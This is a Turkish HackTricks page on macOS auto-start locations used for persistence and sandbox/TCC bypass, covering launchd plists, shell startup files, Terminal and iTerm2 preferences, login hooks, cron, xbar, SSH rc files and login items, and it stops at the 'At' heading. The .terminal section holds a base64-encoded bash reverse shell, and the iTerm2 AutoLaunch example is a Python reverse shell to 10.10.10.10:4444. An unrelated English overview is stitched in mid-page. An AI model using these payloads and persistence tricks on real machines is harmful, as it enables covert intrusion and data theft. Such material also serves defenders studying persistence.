hacktricks/macos-hardening/macos-auto-start-locations.md

# macOS Otomatik Başlatma

<details>

<summary><strong>AWS hacklemeyi sıfırdan ileri seviyeye öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'de **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.

</details>

Bu bölüm, [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/) blog serisine dayanmaktadır. Amacı, **daha fazla Otomatik Başlatma Konumu** eklemek (mümkünse), günümüzdeki macOS'ın en son sürümüyle (13.4) **hala çalışan teknikleri belirtmek** ve gerekli olan **izinleri** belirtmektir.

## Kum Havuzu Atlatma

{% hint style="success" %}
Burada, **kum havuzu atlatma** için yararlı olan başlatma konumlarını bulabilirsiniz. Bu, bir şeyi **bir dosyaya yazarak** ve bir **çok yaygın eylem**, belirli bir **zaman miktarı** veya genellikle bir kum havuzundan **kök izinleri gerektirmeden** gerçekleştirebileceğiniz bir **eylem** için **bekleyerek** basitçe yürütmenize olanak tanır.
{% endhint %}

### Launchd

* Kum havuzu atlatma için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* TCC Atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konumlar

* **`/Library/LaunchAgents`**
* **Tetikleyici**: Yeniden başlatma
* Kök izni gereklidir
* **`/Library/LaunchDaemons`**
* **Tetikleyici**: Yeniden başlatma
* Kök izni gereklidir
* **`/System/Library/LaunchAgents`**
* **Tetikleyici**: Yeniden başlatma
* Kök izni gereklidir
* **`/System/Library/LaunchDaemons`**
* **Tetikleyici**: Yeniden başlatma
* Kök izni gereklidir
* **`~/Library/LaunchAgents`**
* **Tetikleyici**: Yeniden oturum açma
* **`~/Library/LaunchDemons`**
* **Tetikleyici**: Yeniden oturum açma

#### Açıklama ve Sömürü

**`launchd`**, başlangıçta OX S çekirdeği tarafından yürütülen **ilk işlem** ve kapanırken sonuncusudur. Her zaman **PID 1**'e sahip olmalıdır. Bu işlem, **ASEP** **plistlerinde** belirtilen yapılandırmaları **okuyacak ve yürütecek**:

* `/Library/LaunchAgents`: Yönetici tarafından yüklenen kullanıcı başına ajanlar
* `/Library/LaunchDaemons`: Yönetici tarafından yüklenen sistem genelinde hizmetler
* `/System/Library/LaunchAgents`: Apple tarafından sağlanan kullanıcı başına ajanlar.
* `/System/Library/LaunchDaemons`: Apple tarafından sağlanan sistem genelinde hizmetler.

Bir kullanıcı oturum açtığında, `/Users/$USER/Library/LaunchAgents` ve `/Users/$USER/Library/LaunchDemons` konumlarındaki plist'ler **oturum açan kullanıcı izinleriyle** başlatılır.

**Ajanlar ve hizmetler arasındaki temel fark, ajanların kullanıcı oturum açtığında yüklenmesi ve hizmetlerin sistem başlatıldığında yüklenmesidir** (çünkü ssh gibi hizmetlerin, herhangi bir kullanıcının sisteme erişmeden önce yürütülmesi gerekmektedir). Ayrıca ajanlar GUI kullanabilirken, hizmetler arka planda çalışmalıdır.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.someidentifier</string>
<key>ProgramArguments</key>
<array>
<string>bash -c 'touch /tmp/launched'</string> <!--Prog to execute-->
</array>
<key>RunAtLoad</key><true/> <!--Execute at system startup-->
<key>StartInterval</key>
<integer>800</integer> <!--Execute each 800s-->
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key></false> <!--Re-execute if exit unsuccessful-->
<!--If previous is true, then re-execute in successful exit-->
</dict>
</dict>
</plist>
```
Bazı durumlarda, **kullanıcı oturum açmadan önce bir ajanın çalıştırılması gerekebilir**, bunlara **PreLoginAgents** denir. Örneğin, bu, oturum açılırken destekleyici teknoloji sağlamak için kullanışlıdır. Bunlar ayrıca `/Library/LaunchAgents` dizininde de bulunabilir (bir örnek için [**buraya**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) bakın).

{% hint style="info" %}
Yeni Daemon veya Ajan yapılandırma dosyaları, **bir sonraki yeniden başlatmadan sonra veya** `launchctl load <hedef.plist>` **kullanılarak yüklenecektir**. Ayrıca, `.plist` uzantısız dosyaları da `launchctl -F <dosya>` ile yüklemek mümkündür (ancak bu plist dosyaları otomatik olarak yeniden başlatmadan sonra yüklenmeyecektir).\
`launchctl unload <hedef.plist>` ile **boşaltmak** da mümkündür (bu işaret ettiği işlem sonlandırılacaktır).

Bir **Ajanın** veya **Daemon'ın** **çalışmasını engelleyen** bir **geçersiz kılma** gibi **herhangi bir şeyin olmadığından emin olmak için** şunu çalıştırın: `sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.smdb.plist`
{% endhint %}

Mevcut kullanıcı tarafından yüklenen tüm ajanları ve daemonları listele:
```bash
launchctl list
```
{% hint style="warning" %}
Eğer bir plist dosyası bir kullanıcıya aitse, hatta daemon sistem genelindeki klasörlerde olsa bile, **görev kullanıcı olarak** ve kök olarak değil yürütülecektir. Bu bazı ayrıcalık yükseltme saldırılarını önleyebilir.
{% endhint %}

### kabuk başlangıç dosyaları

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0001/](https://theevilbit.github.io/beyond/beyond\_0001/)\
Açıklama (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* TCC Atlatma: [✅](https://emojipedia.org/check-mark-button)
* Ancak bu dosyaları yükleyen bir kabuk yürüten TCC atlatması olan bir uygulama bulmanız gerekmektedir

#### Konumlar

* **`~/.zshrc`, `~/.zlogin`, `~/.zshenv.zwc`**, **`~/.zshenv`, `~/.zprofile`**
* **Tetikleyici**: zsh ile bir terminal aç
* **`/etc/zshenv`, `/etc/zprofile`, `/etc/zshrc`, `/etc/zlogin`**
* **Tetikleyici**: zsh ile bir terminal aç
* Kök gereklidir
* **`~/.zlogout`**
* **Tetikleyici**: zsh ile bir terminali kapat
* **`/etc/zlogout`**
* **Tetikleyici**: zsh ile bir terminali kapat
* Kök gereklidir
* Muhtemelen daha fazlası: **`man zsh`**
* **`~/.bashrc`**
* **Tetikleyici**: bash ile bir terminal aç
* `/etc/profile` (çalışmadı)
* `~/.profile` (çalışmadı)
* `~/.xinitrc`, `~/.xserverrc`, `/opt/X11/etc/X11/xinit/xinitrc.d/`
* **Tetikleyici**: xterm ile tetiklenmesi beklenir, ancak **kurulu değil** ve kurulduktan sonra bile bu hata alınır: xterm: `DISPLAY is not set`

#### Açıklama ve Sömürü

`zsh` veya `bash` gibi bir kabuk ortamı başlatıldığında, **belirli başlangıç dosyaları çalıştırılır**. macOS şu anda varsayılan kabuk olarak `/bin/zsh` kullanmaktadır. Bu kabuk, Terminal uygulaması başlatıldığında veya bir cihaz SSH ile erişildiğinde otomatik olarak erişilir. macOS'ta ayrıca `bash` ve `sh` de bulunmaktadır, ancak kullanılmak için açıkça çağrılması gerekmektedir.

`man zsh` ile okuyabileceğimiz zsh'in man sayfası, başlangıç dosyalarının uzun bir açıklamasına sahiptir.
```bash
# Example executino via ~/.zshrc
echo "touch /tmp/hacktricks" >> ~/.zshrc
```
### Yeniden Açılan Uygulamalar

{% hint style="danger" %}
Belirtilen açığı yapılandırmak ve oturumu kapatıp açmak veya hatta yeniden başlatmak, uygulamayı çalıştırmam için işe yaramadı. (Uygulama çalıştırılmıyordu, belki bu eylemler gerçekleştirilirken uygulamanın çalışıyor olması gerekiyor)
{% endhint %}

**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0021/](https://theevilbit.github.io/beyond/beyond\_0021/)

* Kum havuzunu atlamak için faydalı: [✅](https://emojipedia.org/check-mark-button)
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* **`~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist`**
* **Tetikleyici**: Uygulamaları yeniden açma işlemi

#### Açıklama ve Sömürü

Yeniden açılacak tüm uygulamalar, `~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist` plist dosyasının içindedir.

Bu nedenle, yeniden açılacak uygulamalar arasına kendi uygulamanızı eklemek için **uygulamanızı listeye eklemeniz yeterlidir**.

UUID, bu dizini listelerken veya `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` komutu ile bulunabilir.

Yeniden açılacak uygulamaları kontrol etmek için şunu yapabilirsiniz:
```bash
defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
#or
plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist
```
**Bu listeye bir uygulama eklemek için** şunları kullanabilirsiniz:
```bash
# Adding iTerm2
/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist
```
### Terminal Tercihleri

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
* Terminal, kullanıcının FDA izinlerine sahip olmasını gerektirir.

#### Konum

* **`~/Library/Preferences/com.apple.Terminal.plist`**
* **Tetikleyici**: Terminalı Aç

#### Açıklama ve Sömürü

**`~/Library/Preferences`** içerisinde, Kullanıcı Tercihleri Uygulamalarında saklanır. Bu tercihlerin bazıları, **diğer uygulamalar/skriptleri çalıştırmak** için bir yapılandırma tutabilir.

Örneğin, Terminal Başlangıçta bir komutu çalıştırabilir:

<figure><img src="../.gitbook/assets/image (676).png" alt="" width="495"><figcaption></figcaption></figure>

Bu yapılandırma, **`~/Library/Preferences/com.apple.Terminal.plist`** dosyasında şu şekilde yansıtılır:
```bash
[...]
"Window Settings" => {
"Basic" => {
"CommandString" => "touch /tmp/terminal_pwn"
"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
"FontAntialias" => 1
"FontWidthSpacing" => 1.004032258064516
"name" => "Basic"
"ProfileCurrentVersion" => 2.07
"RunCommandAsShell" => 0
"type" => "Window Settings"
}
[...]
```
Yani, sistemdeki terminalin tercihlerinin plist'i üzerine yazılırsa, **`open`** işlevi kullanılarak **terminal açılabilir ve o komut çalıştırılabilir**.

Bunu terminalden şu şekilde ekleyebilirsiniz:

{% code overflow="wrap" %}
```bash
# Add
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist

# Remove
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist
```
{% endcode %}

### Terminal Betikleri / Diğer dosya uzantıları

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
* Terminal, kullanıcının FDA izinlerine sahip olmasını gerektirir

#### Konum

* **Herhangi bir yer**
* **Tetikleyici**: Terminali Aç

#### Açıklama ve Sömürü

Eğer bir [**`.terminal`** betiği](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) oluşturursanız ve açarsanız, **Terminal uygulaması** otomatik olarak açılacak ve içinde belirtilen komutları çalıştırmak için çağrılacaktır. Eğer Terminal uygulamasının özel izinleri varsa (örneğin TCC gibi), komutunuz bu özel izinlerle çalıştırılacaktır.

Denemek için:
```bash
# Prepare the payload
cat > /tmp/test.terminal << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CommandString</key>
<string>mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;</string>
<key>ProfileCurrentVersion</key>
<real>2.0600000000000001</real>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>exploit</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>
EOF

# Trigger it
open /tmp/test.terminal

# Use something like the following for a reverse shell:
<string>echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;</string>
```
### Ses Eklentileri

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0013/](https://theevilbit.github.io/beyond/beyond\_0013/)\
Açıklama: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* TCC atlatma: [🟠](https://emojipedia.org/large-orange-circle)
* Ek TCC erişimi alabilirsiniz

#### Konum

* **`/Library/Audio/Plug-Ins/HAL`**
* Root gereklidir
* **Tetik**: coreaudiod veya bilgisayar yeniden başlatılmalıdır
* **`/Library/Audio/Plug-ins/Components`**
* Root gereklidir
* **Tetik**: coreaudiod veya bilgisayar yeniden başlatılmalıdır
* **`~/Library/Audio/Plug-ins/Components`**
* **Tetik**: coreaudiod veya bilgisayar yeniden başlatılmalıdır
* **`/System/Library/Components`**
* Root gereklidir
* **Tetik**: coreaudiod veya bilgisayar yeniden başlatılmalıdır

#### Açıklama

Önceki açıklamalara göre **bazı ses eklentilerini derleyip** yüklemek mümkündür.

### QuickLook Eklentileri

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* TCC atlatma: [🟠](https://emojipedia.org/large-orange-circle)
* Ek TCC erişimi alabilirsiniz

#### Konum

* `/System/Library/QuickLook`
* `/Library/QuickLook`
* `~/Library/QuickLook`
* `/Applications/AppNameHere/Contents/Library/QuickLook/`
* `~/Applications/AppNameHere/Contents/Library/QuickLook/`

#### Açıklama ve Sömürü

QuickLook eklentileri, bir dosyanın önizlemesini **tetiklediğinizde** (Finder'da dosya seçiliyken boşluk çubuğuna basın) ve **o dosya türünü destekleyen bir eklenti** yüklü olduğunda çalıştırılabilir.

Kendi QuickLook eklentinizi derleyip, onu yüklemek için önceki konumlardan birine yerleştirebilir ve ardından desteklenen bir dosyaya gidip tetiklemek için boşluk tuşuna basabilirsiniz.

### ~~Giriş/Çıkış Kancaları~~

{% hint style="danger" %}
Bu benim için çalışmadı, ne kullanıcı GirişKancası ne de kök ÇıkışKancası ile.
{% endhint %}

**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0022/](https://theevilbit.github.io/beyond/beyond\_0022/)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` gibi bir şeyi yürütebilmelisiniz
* `~/Library/Preferences/com.apple.loginwindow.plist` içinde bulunur

Eskimiş olsalar da, bir kullanıcı oturum açtığında komutları yürütmek için kullanılabilirler.
```bash
cat > $HOME/hook.sh << EOF
#!/bin/bash
echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh
```
Bu ayar `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` dosyasında saklanır.
```bash
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
oneTimeSSMigrationComplete = 1;
}
```
Silmek için:
```bash
defaults delete com.apple.loginwindow LoginHook
defaults delete com.apple.loginwindow LogoutHook
```
Root kullanıcısı **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`** içinde saklanır.

## Koşullu Kum Sandığı Atlatma

{% hint style="success" %}
Burada, **kum sandığı atlatma** için yararlı olan başlangıç konumlarını bulabilirsiniz, bu da size basitçe bir şeyi **bir dosyaya yazarak** ve belirli **programlar yüklü, "sıradışı" kullanıcı** eylemleri veya ortamlar gibi belirli **yaygın olmayan koşulların** olmasını beklemek anlamına gelir.
{% endhint %}

### Cron

**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0004/](https://theevilbit.github.io/beyond/beyond\_0004/)

* Kum sandığını atlamak için yararlı: [✅](https://emojipedia.org/check-mark-button)
* Ancak, `crontab` ikilisini çalıştırabilmeniz gerekir
* Veya root olmanız gerekir
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* **`/usr/lib/cron/tabs/`, `/private/var/at/tabs`, `/private/var/at/jobs`, `/etc/periodic/`**
* Doğrudan yazma erişimi için root gereklidir. `crontab <dosya>`yı çalıştırabilirseniz root gerekli değildir
* **Tetikleyici**: Cron işine bağlıdır

#### Açıklama ve Sömürü

**Mevcut kullanıcının** cron işlerini listelemek için:
```bash
crontab -l
```
MacOS'ta, **`/usr/lib/cron/tabs/`** ve **`/var/at/tabs/`** (root gerektirir) dizinlerinde kullanıcıların tüm cron işlerini görebilirsiniz.

MacOS'ta, belirli bir sıklıkla betikleri çalıştıran birkaç klasör bulunabilir:
```bash
# The one with the cron jobs is /usr/lib/cron/tabs/
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
```
Burada düzenli **cron işleri**, **at işleri** (pek kullanılmaz) ve **periyodik işler** (genellikle geçici dosyaları temizlemek için kullanılır) bulabilirsiniz. Günlük periyodik işler örneğin şu şekilde çalıştırılabilir: `periodic daily`.

**Kullanıcı cron işi programatik olarak eklemek** için şu kullanılabilir:
```bash
echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
crontab /tmp/cron
```
### iTerm2

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0002/](https://theevilbit.github.io/beyond/beyond\_0002/)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
* iTerm2, TCC izinlerine sahip olabilir

#### Konumlar

* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**
* **Tetikleyici**: iTerm aç
* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`**
* **Tetikleyici**: iTerm aç
* **`~/Library/Preferences/com.googlecode.iterm2.plist`**
* **Tetikleyici**: iTerm aç

#### Açıklama ve Sömürü

**`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** konumunda depolanan betikler çalıştırılacaktır. Örneğin:
```bash
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF
#!/bin/bash
touch /tmp/iterm2-autolaunch
EOF

chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
```
## macOS Auto-Start Locations

### Launch Agents

Launch Agents are used to run processes when a user logs in. They are stored in the following locations:

- `/Library/LaunchAgents/`
- `/System/Library/LaunchAgents/`
- `/Users/username/Library/LaunchAgents/`

### Launch Daemons

Launch Daemons are used to run processes at system startup. They are stored in the following locations:

- `/Library/LaunchDaemons/`
- `/System/Library/LaunchDaemons/`

### Login Items

Login Items are applications that open when a user logs in. They can be managed in:

- `System Preferences > Users & Groups > Login Items`

### Startup Items

Startup Items are legacy items that automatically launch when a user logs in. They are stored in:

- `/Library/StartupItems/`

### Cron Jobs

Cron Jobs are scheduled tasks that run at specific times. They can be viewed and managed using the `crontab` command.
```bash
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF
#!/usr/bin/env python3
import iterm2,socket,subprocess,os

async def main(connection):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
async with iterm2.CustomControlSequenceMonitor(
connection, "shared-secret", r'^create-window$') as mon:
while True:
match = await mon.async_get()
await iterm2.Window.async_create(connection)

iterm2.run_forever(main)
EOF
```
Betik **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** de yürütülecektir:
```bash
do shell script "touch /tmp/iterm2-autolaunchscpt"
```
**`~/Library/Preferences/com.googlecode.iterm2.plist`** konumundaki iTerm2 tercihleri, iTerm2 terminali açıldığında **çalıştırılacak bir komutu belirtebilir**.

Bu ayar, iTerm2 ayarlarında yapılandırılabilir:

<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>

Ve komut tercihlere yansıtılır:
```bash
plutil -p com.googlecode.iterm2.plist
{
[...]
"New Bookmarks" => [
0 => {
[...]
"Initial Text" => "touch /tmp/iterm-start-command"
```
Komutun çalıştırılacağı şekli ayarlayabilirsiniz:

{% code overflow="wrap" %}
```bash
# Add
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist

# Call iTerm
open /Applications/iTerm.app/Contents/MacOS/iTerm2

# Remove
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist
```
{% endcode %}

{% hint style="warning" %}
İTerm2 tercihlerini kötüye kullanmak için **başka yolların** yüksek olasılıkla olduğu düşünülmektedir.
{% endhint %}

### xbar

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0007/](https://theevilbit.github.io/beyond/beyond\_0007/)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* Ancak xbar yüklü olmalı
* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
* Erişilebilirlik izni istiyor

#### Konum

* **`~/Library/Application\ Support/xbar/plugins/`**
* **Tetikleyici**: xbar çalıştırıldığında

#### Açıklama

Eğer popüler program [**xbar**](https://github.com/matryer/xbar) yüklü ise, xbar başlatıldığında çalıştırılacak bir kabuk betiği **`~/Library/Application\ Support/xbar/plugins/`** dizininde yazılabilir:
```bash
cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF
#!/bin/bash
touch /tmp/xbar
EOF
chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"
```
### Hammerspoon

**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* Ancak Hammerspoon yüklü olmalı
* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
* Erişilebilirlik izinleri istiyor

#### Konum

* **`~/.hammerspoon/init.lua`**
* **Tetikleyici**: Hammerspoon çalıştırıldığında

#### Açıklama

[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon), işlemleri için **LUA betik dili**ni kullanan bir otomasyon platformu olarak **macOS** için hizmet verir. Özellikle, tam AppleScript kodunun entegrasyonunu destekler ve kabuk betiklerinin yürütülmesini sağlayarak betikleme yeteneklerini önemli ölçüde artırır.

Uygulama, tek bir dosya olan `~/.hammerspoon/init.lua` dosyasını arar ve betik başlatıldığında yürütülür.
```bash
mkdir -p "$HOME/.hammerspoon"
cat > "$HOME/.hammerspoon/init.lua" << EOF
hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2")
EOF
```
### BetterTouchTool

* Kullanışlıdır çünkü kum havuzunu atlar: [✅](https://emojipedia.org/check-mark-button)
* Ancak BetterTouchTool yüklü olmalıdır
* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
* Otomasyon-Kısayolları ve Erişilebilirlik izinleri istiyor

#### Konum

* `~/Library/Application Support/BetterTouchTool/*`

Bu araç, bazı kısayollar basıldığında uygulamaları veya betikleri yürütmek için gösterge koymayı sağlar. Bir saldırgan, kendi **kısayolunu ve eylemini yürütmek için veritabanında yapılandırabilir** ve keyfi kod yürütebilir (bir kısayol sadece bir tuşa basmak olabilir).

### Alfred

* Kullanışlıdır çünkü kum havuzunu atlar: [✅](https://emojipedia.org/check-mark-button)
* Ancak Alfred yüklü olmalıdır
* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
* Otomasyon, Erişilebilirlik ve hatta Tam Disk erişimi izinleri istiyor

#### Konum

* `???`

Belirli koşullar karşılandığında kod yürütebilen iş akışları oluşturmayı sağlar. Bir saldırganın bir iş akışı dosyası oluşturup Alfred'ın bunu yüklemesini sağlaması potansiyel olarak mümkündür (iş akışlarını kullanabilmek için premium sürümü kullanmak gereklidir).

### SSHRC

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0006/](https://theevilbit.github.io/beyond/beyond\_0006/)

* Kullanışlıdır çünkü kum havuzunu atlar: [✅](https://emojipedia.org/check-mark-button)
* Ancak ssh etkinleştirilmiş ve kullanılmış olmalıdır
* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
* SSH'nin FDA erişimine sahip olması gerekmektedir

#### Konum

* **`~/.ssh/rc`**
* **Tetikleyici**: SSH üzerinden oturum açma
* **`/etc/ssh/sshrc`**
* Root gereklidir
* **Tetikleyici**: SSH üzerinden oturum açma

{% hint style="danger" %}
SSH'yi açmak için Tam Disk Erişimi gereklidir:
```bash
sudo systemsetup -setremotelogin on
```
{% endhint %}

#### Açıklama ve Sömürü

Varsayılan olarak, `/etc/ssh/sshd_config` dosyasında `PermitUserRC no` belirtilmediği sürece, bir kullanıcı **SSH üzerinden giriş yaptığında** **`/etc/ssh/sshrc`** ve **`~/.ssh/rc`** betikleri çalıştırılacaktır.

### **Giriş Öğeleri**

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0003/](https://theevilbit.github.io/beyond/beyond\_0003/)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* Ancak `osascript`'i argümanlarla çalıştırmanız gerekmektedir
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konumlar

* **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
* **Tetikleyici:** Giriş
* Sömürü yükü, **`osascript`** çağrısıyla depolanmıştır
* **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
* **Tetikleyici:** Giriş
* Root gereklidir

#### Açıklama

Sistem Tercihleri -> Kullanıcılar ve Gruplar -> **Giriş Öğeleri**'nde, **kullanıcı oturum açtığında çalıştırılacak öğeleri** bulabilirsiniz.\
Onları komut satırından listelemek, eklemek ve kaldırmak mümkündür:
```bash
#List all items:
osascript -e 'tell application "System Events" to get the name of every login item'

#Add an item:
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'

#Remove an item:
osascript -e 'tell application "System Events" to delete login item "itemname"'
```
Bu öğeler **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** dosyasında saklanır.

**Giriş öğeleri** ayrıca [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) API'sini kullanarak belirtilebilir, bu da yapılandırmayı **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** dosyasında saklayacaktır.

### ZIP olarak Giriş Öğesi

(Giriş Öğeleri hakkında önceki bölüme bakın, bu bir uzantıdır)

Eğer bir **ZIP** dosyasını bir **Giriş Öğesi** olarak saklarsanız, **`Archive Utility`** onu açacak ve örneğin ZIP dosyası **`~/Library`** içinde saklanmış ve **`LaunchAgents/file.plist`** adlı bir arka kapı içeren bir Klasör içeriyorsa (varsayılan olarak değil), o klasör oluşturulacak ve plist eklenecektir, böylece kullanıcı bir dahaki sefer oturum açtığında, **plist'te belirtilen arka kapı yürütülecektir**.

Başka bir seçenek, **`.bash_profile`** ve **`.zshenv`** dosyalarını kullanıcı HOME içine oluşturmaktır, böylece LaunchAgents klasörü zaten varsa bu teknik yine de çalışacaktır.

### At

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0014/](https://theevilbit.github.io/beyond/beyond\_0014/)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* Ancak **`at`**'ı **çalıştırmanız** ve etkin olması **gerekmektedir**
* TCC atlaması: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

